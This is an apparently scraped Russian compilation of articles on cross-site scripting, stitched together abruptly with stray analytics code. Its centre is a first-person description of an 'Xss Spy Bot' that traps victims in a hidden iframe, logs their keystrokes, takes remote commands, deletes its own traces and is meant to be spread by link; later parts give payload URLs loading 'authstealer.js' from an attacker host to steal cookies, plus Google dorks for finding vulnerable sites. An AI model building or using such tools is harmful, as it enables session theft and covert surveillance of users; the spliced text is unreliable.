Injection и xss в распределенных информационных системах. Что собой представляет XSS-уязвимость

Использование заголовков безопасности является важным звеном в защите сайта и его посетителей от хакерских атак. В прошлой статье про из рубрики по защите и безопасности я обещал регулярно публиковать записи на эту тему. Сегодня я расскажу про защиту от XSS атаки.

Что такое XSS-атака

Межсайтовый скриптинг (Cross Site Scripting) — это уязвимость, которая позволяет злоумышленнику внедрить вредоносный код (обычно HTML или JavaScript) в содержимое сайта. Вредоносный код выполняется в браузере пользователя, который просматривает зараженную страницу сайта.

Злоумышленники могут эксплуатировать различные уязвимости. Наибольшее распространение получили два типа атаки:

• Отражённая (Reflected XSS) — самый распространенный непостоянный тип атаки, требующий выполнения определённого действия со стороны пользователя.
• Хранимая (Persistent XSS) — постоянный тип атаки с внедрением вредоносного кода на сервер, не требует вмешательства пользователя.

Отражённая XSS-атака

Срабатывает при переходе пользователя по специально подготовленной ссылке, которая отправляет запрос на сайт с уязвимостью. Данная уязвимость обычно является результатом недостаточной фильтрации входящих запросов, что позволяет манипулировать функциями и активировать вредоносные скрипты.

1. Злоумышленник внедряет в гиперссылку вредоносный скрипт, позволяющий просматривать cookies пользовательской сессии, и отправляет жертве по электронной почте или другим средствам коммуникации.
2. При переходе по ссылке пользователь становится захваченным.
3. Скрипт выполняется в браузере пользователя.
4. Браузер отправляет cookies злоумышленнику, обеспечивая доступ к личным данным пользователя.

Хранимая XSS-атака

Для успешного выполнения хранимой атаки злоумышленнику достаточно найти уязвимость на сайте и разместить на своём сервере вредоносный скрипт. Затем на сайте размещается тег

http : //site.com/search.php?q=123

http://site.com/search.php?q=123

http : //site.com/search.php?q=123

мы лишим его этой возможности.

Но у этой техники есть еще более интересное и мощное применение. Мы будем имитировать юзеру его пребывание на сайте после перехода по ссылке, на самом деле он будет оставаться на одной странице все время, а в это время будет работать сторонний скрипт, добывающий и отсылающий инфу атакующему. Таким образом,XSS будет работать на протяжении всего времени, пока юзер переходит по ссылка на этом домене .

Обозначаем идею.

Общий принцип работы такой: когда юзер заходит на страницу с XSS, скрипт создает iframe с таким же адресом, как это страница и «прикрепляет» его на первый план, у пользователя создается впечатление, будто страница загрузилась нормально, ведь iframe можно увидеть только в коде страницы.

А вспомогательный скрипт контролирует логику бота-шпиона, то есть следит за тем, когда во фрейме поменяется адрес, чтобы поменять его в адресной строке, если же в новоизмененном адресе фрейма другой домен, то можно открыть его на новой влкадке, или же придется перезагружать страницу, чтобы не спалиться.
Таким образом, чтобы XSS перестала выполняться в данный момент, юзер должен или обновить страницу вручную (если XSS - Reflected и передавалась методом POST, в остальных случаях обновление не спасет, и кстати некоторые браузеры сейчас при обновлении старницы могут опять отправить POST запрос повторно) или закрыть вкладку или перейти на другой домен (хотя в этом случае еще можно избежать потери управления).

Если он переходит в поддомент атакуемого домена, то тут выбор атакующего, то есть XSS будет работать, но есть небольшая вероятность, что юзер просечет несоответствие между адресом. Думаю, что тут по ситуации, например, если атаковался домен google.ru, юзер перешел в облачный файловый сервис гугла, который обычно лежит в поддомене drive.google.ru, то вероятность того, что он заметит подвох при взгляде в адресную строку довольно высока,если он часто пользовался этим сервисом . Иначе можно и рискнуть. Но надо учесть, что читать его данные из фрейма с поддоменом мы уже не сможем, так как Cross Origin Policy не позволит. Зато можем преспокойно полазить по основному домену от его имени в скрытом режиме (нижу будет об этом поподробнее).

Только у данного метода есть ограничения, а именно - он не будет работать, если в ответах веб-сервера сайта есть заголовокX-Frame-Options со значениемDENY . Но лично я такие сайты встречал буквально пару раз, сейчас даже у половиныSAMEORIGIN не выставлен, не говоря уже о полном ограничении черезDENY .

Анализируем идею.

Сейчас многие наверняка вспомнили такую замечательную штуку, какBeEF , в котором есть тоже очень много интересных вещей. Так кстати тоже есть опция форсированного редиректа юзера во фрейме, вот только адрес в адресной строке не изменяется, что может быстро спалить конторку и эта опция немного для других целей служит.
В целом в BeEF’e есть почти все, что необходимо и даже много дополнительных функций, но лично мне хотелось дополнительного функционала, а именно:

• возможность мониторить код страниц, которые доступны атакуемому юзеру в реальном времени;
• возможность смотреть все, что он набирает на том сайте (от логина и пароля, до хоткейев и сообщений), то есть keylogger на JS;
• возможность давать команды на JS своему боту в реальном времени, после просмотра кода полученных страниц;
• возможность оставлять боту команды локально, чтобы он потом их «забирал» и выполнял без прямого нашего участия;
• более маленькая вероятность спалиться боту, или возможность бота «прятаться» от любопытных глаз;

Как было упомянуто выше - решил позаимствовать у BeEF’a классную идею очереди выполнения комманд. Например, были проанализированы страницы, которые скинул бот, когда привелегированный юзер лазил у себя в панеле управления со stored XSS, мы оставляем боту команды - JS-код, типа в следующий раз когда юзер зайдет, нажми эту кнопку, запиши сюда такое значение и тд, когда этот юзер в следующий раз заходит на страницу, бот читает команды и выполняет их, а нам во все не обязательно быть у его штурвала - очень удобно.

В основном такой бот, конечно расчитан для статусных юзеров каких-нибудь сайтов, у которых есть дополнительные «рычаги» управления контентом, другими юзерами и тд. Из запросов по функционалу видно, что без серверной части не обойтись.

Реализуем идею.

Данную часть статьи в принципе можно пропустить, так как она просто описывает процесс реализации нужного бота и некоторые его детали, на случай, если кто-то захочет его переделать или допилить под себя. Хотя у бота в начале кода будут переменные, через которые можно выставить некоторые настройки.
Сначала алгоритм действий бота с момента загрузки:

1) Проверка наличия заголовкаX-Frame-Options:DENY (если есть, то свертываем удочки);
2) Встраивание фрейма и настройка всех компонентов бота;
3) Удаление скрипта и всех следов в HTML-коде;
4) Налаживание контакта с сверверной частью и начало перессылки данными, реагируя на ответы (получая от сервера команды);

Первый пункт сделал не совсем полноценно, то есть бот проверяет только первую страницу и корневую заголовка. Дело в том, что обычно эти заголовки встраиваются веб-сервером и для всех страниц сразу и очень редко, что для отдельной страницы все делается «вручную». Да и этот заголовок сам по себе довольно редок. Ну а по второму и третьему особо говорить нечего, ниже все будет.

Есть относительно важный момент, что перед добавлением кода скрипта бота в своем коде надо избавляться от признаков XSS в адресной строке сразу (от JS кода), так как это уменьшает шансы на обнаружение и самое галвное - предотвращает рекурсию, которая возникает при добавлении во фрейм адреса с тем же XSS кодом, который в свою очередь создает еще один фрейм с собой и тд.

Но на всякий случай в коде бота реализована возможность детекта такой фреймовой рекурсии и предотвращения при первой же попытке добавления фрейма в уже созданный, но лучше не надеятся только на нее, а дополнительно удалять код перед загрузкой кода бота. Хотя я проблем еще не встречал.

Функция проверки обновления фрейма. Перепробовал несколько способов экономно решить эту проблему с помощью вешания обработчиков событий наcontentWindow илиcontentDocument , но ничего не удалось, поэтому пришлось писать функцию, которая чекала бы адрес фрейма и сравнивала его с сохраненным до этого, и на основе этого решала, обновиляется ли фрейм (изменился ли адрес) и потом сама себя рекурсивно вызывала.

Частота таких проверок в секунду регулируется переменнойdelay , которая указана в начале файла кода бота. Но позже, уже написав ее, нашел более эффективное решение - использовать простое решение и повеситьonload на фрейм, так что ту функцию я оставил, но закомментировал, на случай, если она потом окажется более востребованной.

Отправка HTML-кода страницы.

Тут схема довольно простоя - после каждой перезагразуки фрейма (включая перую прогрузку) бот отправляет на сервер весь HTML-код страницы вместе с текущем ее адресом, чтобы потом можно было отличать принадлежность кода к нужным страницам.

На сервере реализована логика складирования страниц - сервер для каждого домена создает папку с названием этого домена и туда сохраняем все данные. Коды страниц сохраняются и постоянно обновляются на актуальные версии, но при этом каждый новый день создается уже новая копия страницы, чтобы можно было при необходимости контролировать историю версий. То есть для/news.php 1 сентября состояние будет обновляться, а уже 2 сентября будет создана ее копия, только актуальная уже на этот день и так с каждым днем заново (если юзер посещает эту страницу каждый день). Название страницы состоит из даты и путя до этой страницы относительно корня сайта (то есть без домена).

Кейлоггер на JavaScript’e.

Идея уже была реализована некоторыми энтузиастами, но для меня их наработки не подходили, хотя бы потому что большинство из них были довольно простыми, то есть детектили код нажатой клавиши и черезString.fromCharCode переводили в символы. Но у такого метода ряд недостатков - управляющие клавиши типа шифта, контрола, пробела и пр, не переводятся ни в какой вид (часто просто в пустой символ), взаимодействие цифро-буквенных клавиш с шифтом некорректно логируется, так как это надо реализовывать программно, а также все нажатые клавиши отображаются в верхнем регистре, что тоже исправлять программно.

В итоге получился кейлоггер, который корректно детектил все клавиши цифр, букв и основных знаков, работая на обоих раскладках, реагирую на шифт и логгируя все основные специальные клавиши. Правда некоторые знаки (в верхней части цифрового ряда, которые печатаются при нажатом шифте и цифре), на некоторых машинах могут отличаться, так как были реализованы по основным стандартом, которые некоторым некоторые компании изменяют.
Каждая порция нажатых символов сохраняется у клиента до тех пор, пока текстовый элемент не потеряет фокус. Далее эта порция отправляется на сервер, где сохраняется в текстовом файле, который также будет создаваться каждый день с новой копией, чтобы не было роста до больших размеров и можно было быстро найти, что юзер набирал в такое время.
По мимо самих клавиш на сервер отправляется с каждой порцией информация об элементе, в котором набирался текст (то есть был ли это, [ </i>или какой-нибудь<i><body> <!-- Yandex.Metrika counter --> <script type="text/javascript" > (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*new Date(); for (var j = 0; j < document.scripts.length; j++) {if (document.scripts[j].src === r) { return; }} k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(93396025, "init", { clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true }); </script> <noscript><div><img src="https://mc.yandex.ru/watch/93396025" style="position:absolute; left:-9999px;" alt="" /></div></noscript> <!-- /Yandex.Metrika counter --> </i>когда юзер пользовался хоткеями), помимо названия элемента отправляется его основные данные (id, name, class - если они пристутствуют), чтобы его потом можно было легко найти в коде. Ну и конечно же записывается адрес страницы, на которой был набор и примерное время этого набора. В общем информации о стучании юзера по клавиатуре отправляется вполне достаточно для последующего ее разбора.</p> <h3><span><u><b>Командование своим ботом. </b> </u> </span></h3> <p>Этот процесс может осуществляться атакующим или на стороне, где запущет серверная часть бота или даже удаленно. После запуска серверного скрипта, стартует самописный миниатюрный веб-сервер, который обслуживает запросы бота и его контролера, который работает через веб-интерфейс. То есть после запуска веб-сервер выдает ссылку, зайдя по которой можно начать отдавать команды боту.</p> <p>Об этой панеле управления. Во-превых, надо было ограничить ее паролем (путь и мало кто будет знать о запущенном сервисе на таком-то порту или об адресе, по которому надо зайти, чтобы этим сервисом воспользоваться), так что при первом заходе сервер запросит пароль, который подается в адресной строке (пример будет указан), подлинник пароля храниться в<i>password.txt </i>, который можно поменять. После первого захода веб-сервер даст команду браузеру сохранить пароль в cookie, так что дальше об этом можно не беспокоиться.</p> <p>На самой странички высылания команд боту находится также информация о состоянии бота - онлайн или оффлайн он на данный момент, и пару настроек, первая из которых - хост, то есть IP-адрес или домен сайта, боту которого будут отправлены команды. Это расчитано на случай, если несколько сайтов будут содержать этого бота, чтобы можно было их идентифицировать. На сервере также для этого случая все данные разделены по папкам с названиями доменов.<br> Далее идет окно, где писать команды боту на JS, и опция, которыя устанавливает, где будет исполняться этот JS-код, на главном окне, где сидит бот или во фрейме - это сделано для удобстве, на всякий случай.</p> <p>Если бота онлайн нет, то сервер просто сохраняет команды и позже, когда бот выходит в онлайн, то есть юзер снова посещает страничку с ним или переходит по ссылке атакующего - эти команды будут исполнены.<br> Это очень удобно, если при первой разведке бот скинул все посещенные юзером страницы (например личного кабинета), изучив код которых мы составили команды на JS, чтобы потом бот щелкнул по нужным нам ссылкам, ввел нужные данные, отобразил нужные картинки и пр, что поможет достичь поставленной цели.</p> <p>А можно прямо в режиме реального вермени, быстро смотреть содержимое страниц через код и отдавать боту команды, чтобы тот прислал код других страниц, перешел по другому адресу и пр. И все это будет делаться «за ширмой» у юзера, который преспокойно будет серфить по сайту чере фрейм.</p> <p>Для своего удобства можно формировать наиболее часто используемые инструкции в целые функции на JS, которые потом заносить в исходный файл боты (<i>xsb.js </i>, о файловой структуре еще будет ниже) и использовать. Или использовать уже те из функций, который заложены в бота, правда там только основа и ничего нового нет, но например можно воспользоваться функцией отправки кода страницы в любой момент времени, а не тогда, когда перезагружается фрейм. Можно написать функцию, которая будет открывать передаваемые ей ссылки в новых фреймах на заднем плане, чтобы просматривать содержимое стразу нескольких страничек от имени юзера (и оперировать этим содержимое его виртуальными руками).</p> <h3><span><u><b>Удаление собственного кода. </b> </u> </span></h3> <p>Ну и последняя возможность реализуется довольно просто (ее можно отключить, задав нужную переменную в файле, они откомментированы). Скрипт, после настройки и вешания всех обработчиков событий, создания всех переменных и функций сам себя удаляет</p> <p>Ведь все данные уже были загружены в оперативную память через браузер, так что беспокоиться не о чем, но это в теории, может потом и будут какие-то проблемы, которые я не учел, так что я воздал переменну, которой можно отключить эту возможность по необходимости.</p> <p>После удаления всех скриптов заметить XSS будет крайне сложно, так как наличия фрейма ни говорит об это довольно косвенно, а сам код можно найти разве что в логах истории сетевого трафика браузера (которые не ведуться по умолчению во многих браузерах, если не открыта панель разработчика).</p> <h3><span><u><b>Серверная часть. </b> </u> </span></h3> <p>Для более простого и удобного способа запуска бота было решено писать свой маленький веб-сервер на сокетах, который бы обслуживал бота, обеспечивал все операции по принятию и размещению присланных данных, передавал бы сообщения между атакующим и ботом и создавал бы атакующему веб-интерфейс для командования.<br> Писался сервер на питоне, я тарался использовать только стандартные библиотеки, чтобы не надо было ничего устанавливать перед запуском. Также сервер сам правит некоторые данные в скриптах, то есть в JS-скрипте бота не надо устанавливать адрес командующего сервера, веб-сервер сам выставит туда нужный при запуске. В конфигурирвоании сервера есть толкьо один параметр - порт, на котором он запуститься (по умолчанию 8000).<br> После запуска сервер выдаст все необходимые данные - ссылку на JS-скрипт, которую надо будет подсунуть, ссылку на панель командования, точнее ссылки - на внешний и локальный адреса, для удобства.</p> <h3><span><u><b>Схема работы с ботом. </b> </u> </span></h3> <p>Запускаем сервер на каком-нибудь невостребованном порту и можно рассылать ссылку со скриптом бота, далее все, кто по ней перейдут будут отсылать вам данные, которые сервер будет сохранять в любое время дня. Потом можно просто их просмотреть, если есть необходимость оставить боту команды и дальше заниматься своими делами.</p> <h3><span><u><b>Файловая структура. </b> </u> </span></h3> <p>В папке есть следующие файлы:</p> <ul><li><b>xsb.py </b>- основной файл, который реализует серверную часть, для работы бота запускить его, а дальше просто использовать предлагаемую им ссылку;</li> <li><b>xsb.js </b>- здесь храниться JS код бота, ссылку на который выдает сервер, в его начале объявлены конфигурационные переменные, которые можно изменить по своему усмотрению (некоторые, а именно хост и порт сервер выставит потом сам, можно не париться);</li> <li><b>panel.html </b>- отсюда сервер берет код для панели управления ботом, можно подправить интерфейс на свое усмотрение;</li> <li><b>password.txt </b>- тут храниться пароль от панели управления, которые можно поменять;</li> <li><b>savedData </b>- это директория, в которой будут создаваться папки с доменами сайтов, в которые будет сохраняться вся информация.</li> </ul><p>Еще раз замечу, что в файле<i>xsb.js </i>можно добавлять свои функции, которые потом вызывать через панель, не расписывая громадные порции кода;</p> <h3><span><u><b>Небольшой анализ итогов. </b> </u> </span></h3> <p>После написания свое придуманного способа удержания юезра на странице с XSS через фреймы (ну как придуманного - я его лично для себя открыл, вполне возможно, что кто-то еще для себя эту же технику «изобретал» или она вообще уже где-то в паблике светилась, ведь сейчас уже разработать что-то по-настоящему новое довольно сложно, и как правило через какое-то время обнаруживаешь, что «это уже было в Симпсонах») я начал более детально копаться в BeEF’e и читать его wiki. После чего обнаружил, что там была реализована другая техника достижения той же цели - продления времени польователя на странице с исполняемой XSS (которую там именовали<i>man-in-the-browser </i>). А реализовывалась так: все ссылки на первоначальной странице изменялись таким образом, что при клике на любую из них скрипт не перезагружал страницу, а через Ajax отправлял запрос на сервер и вставлял полученные в ответе данные, то есть можно сказать искуственно обновлял ее, что было также почти неотличимо от обычного рефреша.</p> <p>Поэтому мне не первому удалось эту задумку реализовать (пусть даже и способы оказались разными). Но у обоих этих методов есть свои недостатки:</p> <p>Способ подгрузки через <iframe> не работает при наличии заголовка в ответе<i>X-Frame-Options:DENY </i>, зато в остальном пашет, как обычное окно браузера;</p> <p>Способ подругзки через ajax работает всегда, если браузер поддерживает это (сейчас все основные барузеры поддерживают), но при этом с новым стандартом Web 2.0 все больше и больше переходов инициируется кастомными событиями любых элементов через JS. Однажды зашел наGoogle AdWords и решил посмотреть, как там у них HTML и JS взаимодействуют, потому что все мои спайдеры крайне плохо справлялись с созаднием карты этого сервиса. И я тихо охреневал весь вечер, насколько там все не привычно было, когда текстовые элементы являлись и кнопками и свитчерами и слайдерами и чем только не изображались, и на каждом висело где-то по 30 обработчиков разных событий.</p> <p>То есть на навороченном сайте кнопка перехода (субъективно ссылка) будет реализована через обычный тег<i><span> </i>, который нагружен стилями и на которого навешано обработчиков событий, один из которых, например,<i>onclick перенаправляет юзера на другую страницу. Также есть стандартные элементы типа [i]<input type=button> </i>или сам<i><button> </i>и пр., которые тоже фактически являются ссылками на другие страницы, но на которые BeEF реагировать не будет и страница просто не будет обновляться при клике на большинство кнопок и других элементов. Что может побудить пользователя обновить страницу или перезайти «с другой стороны», что убивает нашу активную XSS-сессию.</p> <p>Для краткости именования файлов назвал его - Xss Spy Bot.</p> <p>P.S.<br> Все это дело писалось чуть больше месяца в силу периодической нехватки времени и постоянных отвлекающих факторов. Так же из-за этого и качетсво кода и вероятность нарваться на какой-нибудь баг довольно высока. Так что прошу особо не ругаться, а отписываться, что у кого не так, чтобы можно было это исправить.<br> Сам я протестировал бота только на 4 машинах, на всех стоял Debian.</p> <p>В дальних планах на этого бота, если будет мотивация:<br> - реализовать рендеринг кода страниц, которые бот присылает на сервер, чтобы сразу в браузере открывался и его можно было «щупать», тестить на лету;<br> - попробоват словить плюшек с технологии WebRTC, то есть найти способы добыть новую информацию, которая чистым JS не вытягивается;<br> - реализовать общение бота и сервера по протоколу WebSocket поверх HTTP;<br> - добавить некоторые удобства на панель управления;</p> <ul><li>1.Что такое XSS</li> <li>2.Виды XSS</li> <li>3.Особенности XSS основанных на DOM</li> <li>4.XSS Auditor</li> <li>5.Примеры эксплуатирования XSS</li> <li>6.Поиск сайтов уязвимых к XSS</li> <li>7.Программы для поиска и сканирования XSS уязвимости</li> </ul><h2>Что такое XSS </h2> <p>Межсайтовый скриптинг (XSS) – это уязвимость, которая заключается во внедрении кода, исполняемого на стороне клиента (JavaScript) в веб-страницу, которую просматривают другие пользователи.</p><p>Уязвимость возникает из-за недостаточной фильтрации данных, которые пользователь отправляет для вставки в веб-страницу. Намного проще понять на конкретном пример. Вспомните любую гостевую книгу – это программы, которые предназначены для принятия данных от пользователя и последующего их отображения. Представим себе, что гостевая книга никак не проверяет и не фильтрует вводимые данные, а просто их отображает.</p> <p>Можно набросать свой простейший скрипт (нет ничего проще, чем писать плохие скрипты на PHP – этим очень многие занимаются). Но уже предостаточно готовых вариантов. Например, я предлагаю начать знакомство с Dojo и OWASP Mutillidae II. Там есть похожий пример. В автономной среде Dojo перейдите в браузере по ссылке: http://localhost/mutillidae/index.php?page=add-to-your-blog.php</p> <p>Если кто-то из пользователей ввёл:</p><p>Привет! Как дела. </p><p>То веб-страница отобразит:</p><p>Привет! Как дела. </p><p>А если пользователь введёт так:</p><p>Привет! Как дела. <script>alert("Pwned")</script> </p><p>То отобразиться это так:</p> <p><img src='https://i2.wp.com/helpugroup.com/wp-content/uploads/2017/06/02-6.jpg' width="100%" loading=lazy></p> <p>Браузеры хранят множества Cookie большого количества сайтов. Каждый сайт может получить кукиз только сохранённые им самим. Например, сайт example.com сохранил в вашем браузере некоторые кукиз. Вы заши на сайт another.com, этот сайт (клиентские и серверные скрипты) не могут получить доступ к кукиз, которые сохранил сайт example.com.</p> <p>Если сайт example.com уязвим к XSS, то это означает, что мы можем тем или иным способом внедрить в него код JavaScript, и этот код будет исполняться от имени сайта example.com! Т.е. этот код получит, например, доступ к кукиз сайта example.com.</p> <p>Думаю, все помнят, что исполняется JavaScript в браузерах пользователей, т.е. при наличии XSS, внедрённый вредоносный код получает доступ к данным пользователя, который открыл страницу веб-сайта.</p> <p>Внедрённый код умеет всё то, что умеет JavaScript, а именно:</p> <ul><li>получает доступ к кукиз просматриваемого сайта</li> <li>может вносить любые изменения во внешний вид страницы</li> <li>получает доступ к буферу обмена</li> <li>может внедрять программы на JavaScript, например, ки-логеры (перехватчики нажатых клавиш)</li> <li>подцеплять на BeEF</li> </ul><p>Простейший пример с cookie:</p><p> <script>alert(document.cookie)</script> </p><p>На самом деле, <b>alert </b> используется только для выявления XSS. Реальная вредоносная полезная нагрузка осуществляет скрытые действия. Она скрыто связывается с удалённым сервером злоумышленника и передаёт на него украденные данные.</p> <h2>Виды XSS </h2> <p>Самое главное, что нужно понимать про виды XSS то, что они бывают:</p> <ul><li>Хранимые (Постоянные)</li> <li>Отражённые (Непостоянные)</li> </ul><p>Пример постоянных:</p> <ul><li>Введённое злоумышленником специально сформированное сообщение в гостевую книгу (комментарий, сообщение форума, профиль) которое сохраняется на сервере, загружается с сервера каждый раз, когда пользователи запрашивают отображение этой страницы.</li> <li>Злоумышленник получил доступ к данным сервера, например, через SQL инъекцию, и внедрил в выдаваемые пользователю данные злонамеренный JavaScript код (с ки-логерами или с BeEF).</li> </ul><p>Пример непостоянных:</p> <ul><li>На сайте присутствует поиск, который вместе с результатами поиска показывает что-то вроде «Вы искали: [строка поиска]», при этом данные не фильтруются должным образом. Поскольку такая страница отображается только для того, у кого есть ссылка на неё, то пока злоумышленник не отправит ссылку другим пользователям сайта, атака не сработает. Вместо отправки ссылки жертве, можно использовать размещение злонамеренного скрипта на нейтральном сайте, который посещает жертва.</li> </ul><p>Ещё выделяют (некоторые в качестве разновидности непостоянных XSS уязвимостей, некоторые говорят, что этот вид может быть и разновидностью постоянной XSS):</p> <ul><li>DOM-модели</li> </ul><h2><span>Особенности XSS основанных на DOM </span></h2> <p>Если сказать совсем просто, то злонамеренный код «обычных» непостоянных XSS мы можем увидеть, если откроем HTML код. Например, ссылка сформирована подобным образом:</p><p>Http://example.com/search.php?q="/><script>alert(1)</script> </p><p>А при открытии исходного HTML кода мы видим что-то вроде такого:</p><p> < div class = "m__search" > < form method = "get" action = "/search.php" > < input type = "text" class = "ui-input query" name = "q" value = "" /> < script >alert(1)</ script >" /> < button type = "submit" class = "ui-button" >Найти</ button > </ form > </p><p>А DOM XSS меняют DOM структуру, которая формируется в браузере на лету и увидеть злонамеренный код мы можем только при просмотре сформировавшейся DOM структуры. HTML при этом не меняется. Давайте возьмём для примера такой код:</p><p> <!DOCTYPE html> < html > < head > < title >сайт:::DOM XSS</ title > < meta charset = "UTF-8" > < meta name = "viewport" content = "width=device-width, initial-scale=1.0" > </ head > < body > < div id = "default" > An error occurred...</ div > < script > function OnLoad() { var foundFrag = get_fragment(); return foundFrag; } function get_fragment() { var r4c = "(.*?)"; var results = location.hash.match(".*input=token(" + r4c + ");") if (results) { document.getElementById("default").innerHTML = ""; return (unescape(results)); } else { return null; } } display_session = OnLoad(); document.write("Your session ID was: " + display_session + "< br >< br >") </ script > </ body > </ html > </p><p>То в браузере мы увидим:</p> <p><img src='https://i0.wp.com/helpugroup.com/wp-content/uploads/2017/06/04-4.jpg' width="100%" loading=lazy></p> <p>Исходный код страницы:</p> <p><img src='https://i1.wp.com/helpugroup.com/wp-content/uploads/2017/06/05-3.jpg' width="100%" loading=lazy></p> <p>Давайте сформируем адрес следующим образом:</p><p>Http://localhost/tests/XSS/dom_xss.html#input=tokenAlex<script>alert(1)</script>; </p><p>Теперь страница выглядит так:</p> <p><img src='https://i2.wp.com/helpugroup.com/wp-content/uploads/2017/06/06-4.jpg' width="100%" loading=lazy></p> <p>Но давайте заглянем в исходный код HTML:</p> <p>Там совершенно ничего не изменилось. Про это я и говорил, нам нужно смотреть DOM структуру документа, чтобы выявить злонамеренный код:</p> <p><img src='https://i0.wp.com/helpugroup.com/wp-content/uploads/2017/06/08-3.jpg' width="100%" loading=lazy></p> <p>Здесь приведён рабочий прототип XSS, для реальной атаки нам нужна более сложная полезная нагрузка, которая невозможна из-за того, что приложение останавливает чтение сразу после точки с запятой, и что-то вроде <b>alert(1);alert(2) </b> уже невозможно. Тем не менее, благодаря <b>unescape() </b> в возвращаемых данных мы можем использовать полезную нагрузку вроде такой:</p><p>Http://localhost/tests/XSS/dom_xss.html#input=tokenAlex<script>alert(1)%3balert(2)</script>; </p><p>Где мы заменили символ <b>; </b> на кодированный в URI эквивалент!</p> <p>Теперь мы можем написать вредоносную полезную нагрузку JavaScript и составить ссылку для отправки жертве, как это делается для стандартного непостоянного межсайтового скриптинга.</p> <h2>XSS Auditor </h2> <p>В Google Chrome (а также в Opera, которая теперь использует движок Google Chrome), меня ждал вот такой сюрприз:</p> <blockquote><p>dom_xss.html:30 The XSS Auditor refused to execute a script in ‘http://localhost/tests/XSS/dom_xss.html#input=token<script>alert(1)</script>;’ because its source code was found within the request. The auditor was enabled as the server sent neither an ‘X-XSS-Protection’ nor ‘Content-Security-Policy’ header.</p> </blockquote> <p><img src='https://i0.wp.com/helpugroup.com/wp-content/uploads/2017/06/09-2.jpg' width="100%" loading=lazy></p> <p>Т.е. теперь в браузере есть XSS аудитор, который будет пытаться предотвращать XSS. В Firefox ещё нет такой функциональности, но, думаю, это дело времени. Если реализация в браузерах будет удачной, то можно говорить о значительном затруднении применения XSS.</p> <p>Полезно помнить, что современные браузеры предпринимают шаги по ограничение уровня эксплуатации проблем вроде непостоянных XSS и основанных на DOM XSS. В том числе это нужно помнить при тестировании веб-сайтов с помощью браузера – вполне может оказаться, что веб-приложение уязвимо, но вы не видите всплывающего подтверждения только по той причине, что его блокирует браузер.</p> <h2><span>Примеры эксплуатирования XSS </span></h2> <p>Злоумышленники, намеревающиеся использовать уязвимости межсайтового скриптинга, должны подходить к каждому классу уязвимостей по-разному. Здесь описаны векторы атак для каждого класса.</p> <p>При уязвимостях XSS в атаках может использоваться BeEF, который расширяет атаку с веб-сайта на локальное окружение пользователей.</p> <p><b>Пример атаки с непостоянным XSS </b></p> <p>1. Алиса часто посещает определённый веб-сайт, который хостит Боб. Веб-сайт Боба позволяет Алисе осуществлять вход с именем пользователя/паролем и сохранять чувствительные данные, такие как платёжная информация. Когда пользователь осуществляет вход, браузер сохраняет куки авторизации, которые выглядят как бессмысленные символы, т.е. оба компьютера (клиент и сервер) помнят, что она вошла.</p> <p>2. Мэлори отмечает, что веб-сайт Боба содержит непостоянную XSS уязвимость:</p> <p>2.1 При посещении страницы поиска, она вводим строку для поиска и кликает на кнопку отправить, если результаты не найдены, страница отображает введённую строку поиска, за которой следуют слова «не найдено» и url имеет вид <b>http://bobssite.org?q=её поисковый запрос </b></p> <p>2.2 С нормальным поисковым запросом вроде слова «<b>собачки </b>» страница просто отображает «<b>собачки </b> не найдено» и url http://bobssite.org?q=<b>собачки </b>, что является вполне нормальным поведением.</p> <p>2.3 Тем не менее, когда в поиск отправляется аномальный поисковый запрос вроде <b><script type=’text/javascript’>alert(‘xss’);</script> </b>:</p> <p>2.3.1 Появляется сообщение с предупреждением (которое говорит «xss»).</p> <p>2.3.2 Страница отображает <b><script type=’text/javascript’>alert(‘xss’);</script> не найдено </b> наряду с сообщением об ошибке с текстом ‘xss’.</p> <p>2.3.3 url, пригодный для эксплуатации <b>http://bobssite.org?q=<script%20type=’text/javascript’>alert(‘xss’);</script> </b></p> <p>3. Мэлори конструирует URL для эксплуатации уязвимости:</p> <p>3.1 Она делает URL <b>http://bobssite.org?q=puppies<script%20src=»https://mallorysevilsite.com/authstealer.js»></script> </b>. Она может выбрать конвертировать ASCII символы в шестнадцатеричный формат, такой как <b>http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E </b> для того, чтобы люди не смогли немедленно расшифровать вредоносный URL.</p> <p>3.2 Она отправляет e-mail некоторым ничего не подозревающим членом сайта Боба, говоря: «Зацените клёвых собачек».</p> <p>4. Алиса получает письмо. Она любит собачек и кликает по ссылке. Она переходит на сайт Боба в поиск, она не находит ничего, там отображается «собачки не найдено», а в самой середине запускается тэг со скриптом (он невидим на экране), загружает и выполняет программу Мэлори authstealer.js (срабатывание XSS атаки). Алиса забывает об этом.</p> <p>5. Программа authstealer.js запускается в браузере Алисы так, будто бы её источником является веб-сайт Боба. Она захватывает копию куки авторизации Алисы и отправляет на сервер Мэлори, где Мэлори их извлекает.</p> <p>7. Теперь, когда Мэлори внутри, она идёт в платёжный раздел веб-сайта, смотрит и крадёт копию номера кредитной карты Алисы. Затем она идёт и меняет пароль, т.е. теперь Алиса даже не может больше зайти.</p> <p>8. Она решает сделать следующий шаг и отправляет сконструированную подобным образом ссылку самому Бобу, и таким образом получает административные привилегии сайта Боба.</p> <p><b>Атака с постоянным XSS </b></p> <ol><li>Мэлори имеет аккаунт на сайте Боба.</li> <li>Мэлори замечает, что веб-сайт боба содержит постоянную XSS уязвимость. Если вы переходите в новый раздел, размещаете комментарий, то он отображает что бы в него не напечатали. Но если текст комментария содержит HTML тэги, эти тэги будут отображены как есть, и любые тэги скриптов запускаются.</li> <li>Мэлори читает статью в разделе Новости и пишет комментарий в разделе Комментарии. В комментарий она вставляет текст:</li> <li>В этой истории мне так понравились собачки. Они такие славные! <script src=»https://mallorysevilsite.com/authstealer.js»></li> <li>Когда Алиса (или ещё кто-либо) загружают страницу с этим комментарием, тэг скрипта Мэлори запускается и ворует куки авторизации Алисы, отправляет на секретный сервер Мэлори для сбора.</li> <li>Мэлори теперь может перехватить сессию Алисы и выдать себя за Алису.</li> </ol><h2><span>Поиск сайтов уязвимых к XSS </span></h2> <p><b>Дорки для XSS </b></p> <p>Первым шагом является выбор сайтов, на которых мы будем выполнять XSS атаки. Сайты можно искать с помощью дорков Google. Вот несколько из таких дорков, которые скопируйте и вставьте в поиск Гугла:</p> <ul><li>inurl:search.php?q=</li> 